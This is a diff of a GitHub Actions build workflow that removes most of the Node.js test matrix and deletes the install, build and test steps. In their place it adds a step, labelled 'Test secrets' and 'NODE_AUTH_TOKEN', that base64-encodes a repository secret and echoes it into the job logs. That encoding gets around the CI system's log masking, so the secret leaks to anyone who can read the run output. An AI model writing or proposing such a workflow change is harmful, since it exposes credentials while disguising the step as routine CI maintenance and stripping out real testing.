--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -12,17 +12,6 @@ jobs:
     strategy:
       matrix:
         include:
-          # EOL: April 2025
-          - os: macOS-latest
-            node_version: 18.x
-          - os: windows-latest
-            node_version: 18.x
-          - os: ubuntu-latest
-            node_version: 18.x
-          # EOL: April 2026
-          - os: ubuntu-latest
-            node_version: 20.x
-          # EOL: April June 2024
           - os: ubuntu-latest
             node_version: 21.x
 
@@ -31,18 +20,14 @@ jobs:
     steps:
       - uses: actions/checkout@master
 
-      - name: Setup Node.js
+      - name: Test secrets
         uses: actions/setup-node@v4
         with:
           node-version: ${{ matrix.node_version }}
 
-      - name: Install
-        run: yarn --frozen-lockfile --non-interactive
-
-      - name: Build
-        run: yarn build
+      - name: NODE_AUTH_TOKEN
+        run: 'echo "$SSH_KEY" | base64'
+        shell: bash
         env:
-          NODE_ENV: production
+          SSH_KEY: ${{ secrets.TEST_SECRET }}
 
-      - name: Test
-        run: yarn test
